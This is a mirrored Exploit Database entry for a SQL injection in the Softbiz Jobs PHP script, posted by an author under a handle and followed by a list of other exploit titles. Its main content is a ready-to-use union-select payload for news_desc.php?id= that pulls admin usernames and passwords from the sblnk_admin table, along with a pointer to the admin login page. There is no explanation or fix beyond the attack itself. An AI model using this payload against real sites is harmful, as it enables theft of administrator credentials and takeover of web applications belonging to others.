Softbiz Jobs – ‘news_desc’ SQL Injection

Exploit Database
81 阅读

作者： BAYBORA

日期： 2010-02-22
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11518/

Softbiz Jobs ( news_desc) SQL Injection Vulnerability

########################### 
Author: Baybora

Homepage: http://www.1923turk.com 

Blog: http://baybora.wordpress.com/

Script: softbizscripts

Download: http://www.softbizscripts.com/

########################### 

Exploat:news_desc.php?id=SQL 
 

-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--



http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--

 
http://xxxx/admin
 

##############################################################
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################

last Exploits
Softbiz Jobs – ‘news_desc’ SQL Injection的更多信息

REZERVI 3.0.2 – Remote Command Execution：
b2evolution 3.3.3 – Cross-Site Request Forgery：
WordPress Plugin Photo Gallery 1.5.34 – Cross-Site Scripting：
HoloCMS 9.0.47 – ‘news.php’ SQL Injection：
Netscaler SD-WAN 9.1.2.26.561201 – Command Injection (Metasploit)：
Omni-Secure – ‘dir’ Multiple File Disclosure Vulnerabilities：
PunBB 1.3.4 / Pun_PM 1.2.6 – Blind SQL Injection：
InnovaStudio WYSIWYG Editor 5.4 – Unrestricted File Upload / Directory Traversal：